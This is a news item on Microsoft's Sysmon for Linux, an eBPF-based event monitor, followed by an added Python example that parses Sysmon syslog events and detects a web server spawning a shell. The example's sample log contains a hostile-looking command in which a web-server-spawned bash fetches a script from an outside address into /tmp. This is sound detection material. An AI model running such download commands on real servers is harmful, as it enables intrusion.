Microsoft has released Sysmon for Linux and opened its source code

Microsoft has ported its Sysmon system event monitoring service to the Linux platform. On Linux the service is built on the kernel's eBPF subsystem, which lets its event handlers run at the operating system kernel level. The SysinternalsEBPF library, which contains functions useful for building eBPF handlers that track system events, is developed as a separate project. The toolkit code is released under the MIT license, while the eBPF programs are licensed under GPLv2. The packages.microsoft.com repository provides ready-made RPM and DEB packages suitable for popular Linux distributions.

Sysmon lets you keep a log with detailed information about process creation and termination, network connections, and file manipulations. The log stores not only general information but also details useful for analysing security events, such as the parent process name, hashes of the contents of tracked files, information about loaded dynamic libraries, the creation/access/modification/deletion times of files, and data on processes accessing block devices directly. To reduce the volume of recorded data, filters can be configured. The log can be written through the standard syslog facility.
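Because Sysmon for Linux emits each event to syslog as a line carrying the event as XML in the Sysmon event schema, the log can be processed with ordinary tooling. As an added example (not code from the page, from opennet.ru, or from the Sysmon project), the Python below parses a few constructed syslog lines of that shape and runs one detection rule over them: it flags a shell spawned by a web server, then attaches the child process, network connection and file-creation events that follow in the same process tree. The syslog prefix, host name, PIDs, hash, destination address and binary paths are assumptions chosen for the sample, not data from a real host.

```python
"""Parse Sysmon-for-Linux events from syslog lines and run a small detection pass."""
import xml.etree.ElementTree as ET

# Assumed binary paths for a Debian-style host; adjust for the distribution in use.
WEB_SERVERS = {"/usr/sbin/apache2", "/usr/sbin/nginx"}
SHELLS = {"/usr/bin/bash", "/usr/bin/sh", "/usr/bin/dash", "/bin/bash", "/bin/sh"}

# Constructed sample: one syslog line per event, each carrying the Sysmon event XML.
# Field names follow the Sysmon event schema; the hash, PIDs, host name and the
# 198.51.100.7 address (a documentation range) are made up for this example.
SAMPLE_LOG = """\
Oct 14 14:22:00 web01 systemd[1]: Started Session 12 of user root.
Oct 14 14:22:38 web01 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>1</EventID><Computer>web01</Computer></System><EventData><Data Name="RuleName">-</Data><Data Name="UtcTime">2021-10-14 14:22:38.163</Data><Data Name="ProcessId">4211</Data><Data Name="Image">/usr/bin/bash</Data><Data Name="CommandLine">bash -c "curl http://198.51.100.7/x.sh -o /tmp/x.sh"</Data><Data Name="User">www-data</Data><Data Name="Hashes">SHA256=0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef</Data><Data Name="ParentProcessId">1337</Data><Data Name="ParentImage">/usr/sbin/apache2</Data></EventData></Event>
Oct 14 14:22:38 web01 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>1</EventID><Computer>web01</Computer></System><EventData><Data Name="RuleName">-</Data><Data Name="UtcTime">2021-10-14 14:22:38.201</Data><Data Name="ProcessId">4212</Data><Data Name="Image">/usr/bin/curl</Data><Data Name="CommandLine">curl http://198.51.100.7/x.sh -o /tmp/x.sh</Data><Data Name="User">www-data</Data><Data Name="ParentProcessId">4211</Data><Data Name="ParentImage">/usr/bin/bash</Data></EventData></Event>
Oct 14 14:22:38 web01 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>3</EventID><Computer>web01</Computer></System><EventData><Data Name="RuleName">-</Data><Data Name="UtcTime">2021-10-14 14:22:38.240</Data><Data Name="ProcessId">4212</Data><Data Name="Image">/usr/bin/curl</Data><Data Name="User">www-data</Data><Data Name="Protocol">tcp</Data><Data Name="SourceIp">10.0.0.5</Data><Data Name="SourcePort">51822</Data><Data Name="DestinationIp">198.51.100.7</Data><Data Name="DestinationPort">80</Data></EventData></Event>
Oct 14 14:22:38 web01 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>11</EventID><Computer>web01</Computer></System><EventData><Data Name="RuleName">-</Data><Data Name="UtcTime">2021-10-14 14:22:38.390</Data><Data Name="ProcessId">4212</Data><Data Name="Image">/usr/bin/curl</Data><Data Name="TargetFilename">/tmp/x.sh</Data><Data Name="User">www-data</Data></EventData></Event>
Oct 14 14:23:01 web01 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>1</EventID><Computer>web01</Computer></System><EventData><Data Name="RuleName">-</Data><Data Name="UtcTime">2021-10-14 14:23:01.004</Data><Data Name="ProcessId">4300</Data><Data Name="Image">/usr/bin/ls</Data><Data Name="CommandLine">ls -la /var/backups</Data><Data Name="User">root</Data><Data Name="ParentProcessId">900</Data><Data Name="ParentImage">/usr/sbin/cron</Data></EventData></Event>
Oct 14 14:23:02 web01 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>5</EventID><Computer>web01</Computer></System><EventData><Data Name="RuleName">-</Data><Data Name="UtcTime">2021-10-14 14:23:02.110</Data><Data Name="ProcessId">4212</Data><Data Name="Image">/usr/bin/curl</Data><Data Name="User">www-data</Data></EventData></Event>
"""


def parse_sysmon_line(line):
    """Return a flat dict for one Sysmon syslog line, or None for lines without an event."""
    start = line.find("<Event>")
    if start < 0:
        return None  # ordinary syslog traffic, not a Sysmon event
    root = ET.fromstring(line[start:].strip())
    event = {
        "EventID": int(root.findtext("System/EventID")),
        "Computer": root.findtext("System/Computer") or "",
    }
    # Each <Data Name="..."> child becomes one key; values are kept as strings.
    for data in root.iterfind("EventData/Data"):
        event[data.get("Name")] = data.text or ""
    return event


def parse_log(text):
    """Parse every line of a syslog excerpt, dropping non-Sysmon lines."""
    return [e for e in (parse_sysmon_line(l) for l in text.splitlines()) if e]


def detect(events):
    """Flag a web server spawning a shell, then follow that process tree.

    Later events from the flagged process or its descendants (event 1 children,
    event 3 network connections, event 11 file creations) are attached to the alert.
    """
    alerts = []
    tainted = {}  # ProcessId -> alert that owns this process or one of its ancestors
    for e in events:
        eid, pid = e["EventID"], e.get("ProcessId")
        if eid == 1 and e.get("ParentImage") in WEB_SERVERS and e.get("Image") in SHELLS:
            alert = {"rule": "web-server-spawned-shell", "pid": pid, "user": e.get("User"),
                     "cmd": e.get("CommandLine"), "followup": []}
            alerts.append(alert)
            tainted[pid] = alert
        elif eid == 1 and e.get("ParentProcessId") in tainted:
            alert = tainted[e["ParentProcessId"]]
            alert["followup"].append(f"child {e.get('Image')} (pid {pid})")
            tainted[pid] = alert  # descendants inherit the taint
        elif eid == 3 and pid in tainted:
            tainted[pid]["followup"].append(
                f"connect {e.get('DestinationIp')}:{e.get('DestinationPort')} by pid {pid}")
        elif eid == 11 and pid in tainted:
            tainted[pid]["followup"].append(f"create {e.get('TargetFilename')} by pid {pid}")
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_log(SAMPLE_LOG)):
        print(alert["rule"], alert["pid"], alert["user"], alert["cmd"])
        for item in alert["followup"]:
            print("   ", item)
```

The sample is deliberately small; on a real host the taint map should key on the ProcessGuid that Sysmon includes in its events rather than on the numeric ProcessId, since PIDs are reused and a long log will otherwise attach an unrelated later process to an old alert. The benign cron-spawned `ls` and the ProcessTerminate event pass through without producing anything, which is the point of the parent/child condition rather than alerting on every shell.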

Source: opennet.ru
